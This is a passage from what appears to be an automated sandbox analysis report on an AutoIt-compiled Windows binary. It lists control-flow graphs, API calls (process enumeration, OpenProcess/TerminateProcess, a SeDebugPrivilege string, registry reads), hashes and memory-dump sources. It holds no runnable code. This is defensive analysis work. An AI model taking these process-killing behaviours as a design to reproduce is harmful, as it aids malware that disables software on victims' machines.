fbe6a0 817->830 819->777 836 1008ad5 819->836 823->824 825 1008608-100862b call fbad40 823->825 824->814 825->823 825->824 830->779 831->803 883 100867a-1008690 call fcb5b6 831->883 850 100874e-1008751 834->850 851 10087bf-10087de call fbe6a0 834->851 835->803 870 10088bb-10088cd call fcb5b6 835->870 836->754 885 1008a93-1008a9b 838->885 886 1008ab5-1008abe call fbc98d 838->886 890 100870d-1008716 call fb8ec0 841->890 891 10086fe-100870b call fb8ec0 841->891 858 1008a1e-1008a29 call fbb4b1 843->858 859 1008a0f-1008a13 843->859 897 1008ac2-1008ac4 844->897 866 1008757-1008774 call fbe6a0 850->866 867 1008ada-1008ae8 850->867 851->803 889 10087e4-10087f6 call fcb5b6 851->889 858->844 908 1008b0b-1008b19 858->908 859->858 876 1008a15-1008a19 859->876 909 10086ba-10086c3 call fbc98d 860->909 910 fcb1d2-fcb1de 860->910 882 1008949-100894f 863->882 864->882 866->803 900 100877a-100878c call fcb5b6 866->900 874 1008aea 867->874 875 1008aed-1008afd 867->875 916 10088de 870->916 917 10088cf-10088dc call fbc98d 870->917 874->875 892 1008b02-1008b06 875->892 893 1008aff 875->893 894 1008aa1-1008aa3 876->894 882->803 912 1008692-100869b call fbc98d 883->912 913 100869d-10086ab call fb8ec0 883->913 901 1008aa8-1008ab3 call fbb4b1 885->901 902 1008a9d 885->902 886->897 889->803 932 10087fc-1008805 call fcb5b6 889->932 933 1008719-1008724 call fb8577 890->933 891->933 892->818 893->892 894->803 897->803 936 100878e-100879d call fbc98d 900->936 937 100879f 900->937 901->886 901->908 902->894 922 1008b1b 908->922 923 1008b1e-1008b21 908->923 909->805 910->803 943 10086ae-10086b5 912->943 913->943 931 10088e2-10088e9 916->931 917->931 922->923 923->763 939 10088f5 call fb3907 931->939 940 10088eb-10088f0 call fb396b 931->940 954 1008807-1008816 call fbc98d 932->954 955 1008818 932->955 933->803 945 10087a3-10087ae call fd9334 936->945 937->945 953 10088fa 939->953 940->803 943->803 945->754 959 10087b4-10087ba 945->959 953->803 958 100881c-100883f 954->958 955->958 961 1008841-1008848 958->961 962 100884d-1008850 958->962 959->803 961->962 963 1008860-1008863 962->963 964 1008852-100885b 962->964 965 1008873-1008876 963->965 966 1008865-100886e 963->966 964->963 965->803 967 100887c-100888a 965->967 966->965 967->803
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                        • String ID: d0b$d10m0$d1b$d1r0,2$d5m0$i
                                                                                                                                                                                                                                                                                                        • API String ID: 0-4285391669
                                                                                                                                                                                                                                                                                                        • Opcode ID: 014aabfcec4483a1c33535506357f91f16e37fe222c0afa4d41c2c4ed59c1675
                                                                                                                                                                                                                                                                                                        • Instruction ID: f1b074ad0a3e46c59ca8570b9c6970dd26e96578acdeaee8de109c4277a28cbe
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 014aabfcec4483a1c33535506357f91f16e37fe222c0afa4d41c2c4ed59c1675
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 126269B4A08341CFD728DF15C585A9ABBE1BF88304F04896EE4D98B391DB35D945CF82
                                                                                                                                                                                                                                                                                                        Function 0103AB3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                        control_flow_graph 968 103ab3f-103ab6e call fb8ec0 call 101dd87 972 103ab73-103ab76 968->972 973 103abb9-103abbd 972->973 974 103ab78-103ab98 call fbe6a0 972->974 975 103abc3-103abd7 OpenProcess 973->975 976 103ad29-103ad3a call fbe6a0 973->976 983 103ab9a 974->983 984 103ab9d-103abac 974->984 980 103acc2-103accd TerminateProcess 975->980 981 103abdd-103abe6 GetLastError 975->981 989 103ad3c-103ad44 976->989 985 103ad20-103ad27 CloseHandle 980->985 986 103accf-103acf1 GetLastError call fb7b71 980->986 987 103ac72-103ac8f call fb7b71 981->987 988 103abec-103ac06 call 101d715 call 1012010 981->988 983->984 990 103abb1-103abb4 984->990 991 103abae 984->991 985->989 998 103acf3 986->998 999 103acf6-103ad06 986->999 1001 103ac91 987->1001 1002 103ac94-103aca4 987->1002 1010 103ac1a-103ac38 call fb7b71 988->1010 1011 103ac08-103ac18 OpenProcess 988->1011 990->989 991->990 998->999 1003 103ad0b-103ad19 call fbe6a0 999->1003 1004 103ad08 999->1004 1001->1002 1006 103aca6 1002->1006 1007 103aca9-103acb7 call fbe6a0 1002->1007 1003->985 1004->1003 1006->1007 1017 103acbe-103acc0 1007->1017 1019 103ac3a 1010->1019 1020 103ac3d-103ac4d 1010->1020 1014 103ac67-103ac70 call 1011a0b 1011->1014 1014->1017 1017->980 1017->989 1019->1020 1022 103ac52-103ac60 call fbe6a0 1020->1022 1023 103ac4f 1020->1023 1022->1014 1023->1022
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0101DD87: CreateToolhelp32Snapshot.KERNEL32 ref: 0101DDAC
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0101DD87: Process32FirstW.KERNEL32(00000000,?), ref: 0101DDBA
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0101DD87: CloseHandle.KERNEL32(00000000), ref: 0101DE87
                                                                                                                                                                                                                                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0103ABCA
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0103ABDD
                                                                                                                                                                                                                                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0103AC10
                                                                                                                                                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 0103ACC5
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(00000000), ref: 0103ACD0
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0103AD21
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                                                                        • String ID: SeDebugPrivilege
                                                                                                                                                                                                                                                                                                        • API String ID: 2533919879-2896544425
                                                                                                                                                                                                                                                                                                        • Opcode ID: 640abfcaa04f9aec4a0b1dc71c38c0a530cfcf4540a4cd2e1edc990b7c9ae9f2
                                                                                                                                                                                                                                                                                                        • Instruction ID: aae196876d6a85b40dc8f6254b6cbeb515b10216ef3e9fb437abaf7af0d50abc
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 640abfcaa04f9aec4a0b1dc71c38c0a530cfcf4540a4cd2e1edc990b7c9ae9f2
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3961AC74314242AFE724DF19C488F55BBE5AF94308F14848CE9E68B7A3C775E845CB91
                                                                                                                                                                                                                                                                                                        Function 00FB35B3 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                        control_flow_graph 1062 fb35b3-fb3623 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00FB35E1
                                                                                                                                                                                                                                                                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00FB3602
                                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000000,?,?,?,?,?,?,00FB3368,?), ref: 00FB3616
                                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000000,?,?,?,?,?,?,00FB3368,?), ref: 00FB361F
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Window$CreateShow
                                                                                                                                                                                                                                                                                                        • String ID: AutoIt v3$edit
                                                                                                                                                                                                                                                                                                        • API String ID: 1584632944-3779509399
                                                                                                                                                                                                                                                                                                        • Opcode ID: 0c9b4eaef1b5250e26f96e920a7e693259432b7b8d039be7875fd2d1757a5b00
                                                                                                                                                                                                                                                                                                        • Instruction ID: 44d53cf8b1d63fa6f565ee2d59b16369108106c24fca8c003434e2443c752c30
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0c9b4eaef1b5250e26f96e920a7e693259432b7b8d039be7875fd2d1757a5b00
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 62F05EB46443D47BE7314653AC58E3B3EBDE7C6F10F00402EB9C4A7154D26A0851DBB0
                                                                                                                                                                                                                                                                                                        Function 00FB61A9 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00FF5287
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB8577: _wcslen.LIBCMT ref: 00FB858A
                                                                                                                                                                                                                                                                                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00FB6299
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: IconLoadNotifyShell_String_wcslen
                                                                                                                                                                                                                                                                                                        • String ID: Line %d: $AutoIt -
                                                                                                                                                                                                                                                                                                        • API String ID: 2289894680-4094128768
                                                                                                                                                                                                                                                                                                        • Opcode ID: f5b9b4d48f148cdbb5fd845bdf9c024662a1a0531f5f70647c85d2b491ea5a4e
                                                                                                                                                                                                                                                                                                        • Instruction ID: dde37c770f22fb2a369d29357b936bd831458dcd413c1f5e0e96ea5e6739992f
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f5b9b4d48f148cdbb5fd845bdf9c024662a1a0531f5f70647c85d2b491ea5a4e
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A041B171508305AAC720EB61DC41AEF77ECAF98720F00462EF5D5821A1EF789649DB92
                                                                                                                                                                                                                                                                                                        Function 00FB58CB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                        control_flow_graph 1114 fb58cb-fb58d6 1115 fb5948-fb594a 1114->1115 1116 fb58d8-fb58dd 1114->1116 1118 fb593b-fb593e 1115->1118 1116->1115 1117 fb58df-fb58f7 RegOpenKeyExW 1116->1117 1117->1115 1119 fb58f9-fb5918 RegQueryValueExW 1117->1119 1120 fb591a-fb5925 1119->1120 1121 fb592f-fb593a RegCloseKey 1119->1121 1122 fb593f-fb5946 1120->1122 1123 fb5927-fb5929 1120->1123 1121->1118 1124 fb592d 1122->1124 1123->1124 1124->1121
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00FB58BE,SwapMouseButtons,00000004,?), ref: 00FB58EF
                                                                                                                                                                                                                                                                                                        • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00FB58BE,SwapMouseButtons,00000004,?), ref: 00FB5910
                                                                                                                                                                                                                                                                                                        • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00FB58BE,SwapMouseButtons,00000004,?), ref: 00FB5932
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                                                        • String ID: Control Panel\Mouse
                                                                                                                                                                                                                                                                                                        • API String ID: 3677997916-824357125
                                                                                                                                                                                                                                                                                                        • Opcode ID: 758f7bbe8a4faf4dfca77cd20223518297d3a4843f0651bdff867906c2bd82e5
                                                                                                                                                                                                                                                                                                        • Instruction ID: d9d53b685a2406d9616e328a9d6f8b1de52c8a0dd00cf4e86fe0b9317bab3da3
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 758f7bbe8a4faf4dfca77cd20223518297d3a4843f0651bdff867906c2bd82e5
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 40117CB6610618FFDB218FA5C884FEE77B8EF00B60B104459F841E7200E2369E41EB60
                                                                                                                                                                                                                                                                                                        Function 00FBF6D0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        • Variable must be of type 'Object'., xrefs: 010048C6
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                        • String ID: Variable must be of type 'Object'.
                                                                                                                                                                                                                                                                                                        • API String ID: 0-109567571
                                                                                                                                                                                                                                                                                                        • Opcode ID: 081eff4a47d4ca4b7026b257dd2d84bd06db696034fbcb06253c817921b3ace4
                                                                                                                                                                                                                                                                                                        • Instruction ID: cd44f6286891e5560b12469215b952515643d30793beecf62610a67b02cb7ac7
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 081eff4a47d4ca4b7026b257dd2d84bd06db696034fbcb06253c817921b3ace4
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 58C27771E00215DFDB24DF99C880BADB7B1BF48310F24816AE985AB391D739AD45EF90
                                                                                                                                                                                                                                                                                                        Function 00FC0340 Relevance: 5.7, APIs: 3, Instructions: 1236COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00FC15F2
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1385522511-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 6bfde443d6156d4ddd0155a1d5bd97f29997a262c3829106a15b9cfabd0b849b
                                                                                                                                                                                                                                                                                                        • Instruction ID: 39a9733af855ab461506c56beef2a6c49e5461d57888f7966df57c5ee9c5fc11
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6bfde443d6156d4ddd0155a1d5bd97f29997a262c3829106a15b9cfabd0b849b
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 80B28A75A08342CFD724CF18C581B2AB7E1BF89710F14495DE9C58B392DB36E852EB92
                                                                                                                                                                                                                                                                                                        Function 00FD014B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00FD09D8
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FD3614: RaiseException.KERNEL32(?,?,?,00FD09FA,?,00000000,?,?,?,?,?,?,00FD09FA,00000000,01079758,00000000), ref: 00FD3674
                                                                                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00FD09F5
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                                                                                                                                                        • String ID: Unknown exception
                                                                                                                                                                                                                                                                                                        • API String ID: 3476068407-410509341
                                                                                                                                                                                                                                                                                                        • Opcode ID: 9642c8047b5608dfd9facb8580aade39f599810ddd4b155a104c08b56dd27e97
                                                                                                                                                                                                                                                                                                        • Instruction ID: e3d6ba398262c95bfc8204483c2cc3b22f5fcfb905080ac74e4f96076e8582d4
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9642c8047b5608dfd9facb8580aade39f599810ddd4b155a104c08b56dd27e97
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BBF02231D0020DB7CB00BAA8DC16E9E777E5E00320F684023B9149A7A6FF34EA16E6D5
                                                                                                                                                                                                                                                                                                        Function 010389B6 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 01038D52
                                                                                                                                                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 01038D59
                                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,?), ref: 01038F3A
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Process$CurrentFreeLibraryTerminate
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 146820519-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: bafe1cf6b2c60204d3368abdff4e7308600a1a973438b9f4c04f08efb9351f99
                                                                                                                                                                                                                                                                                                        • Instruction ID: 950e182483e98dcb3731b14abf3a6134897cbce2e3e155aba8962880b422989b
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bafe1cf6b2c60204d3368abdff4e7308600a1a973438b9f4c04f08efb9351f99
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C0127A71A083019FD754CF28C484B5ABBE5BF88314F048A9EF9898B252CB75E945CF92
                                                                                                                                                                                                                                                                                                        Function 01039AF3 Relevance: 4.7, APIs: 3, Instructions: 233COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
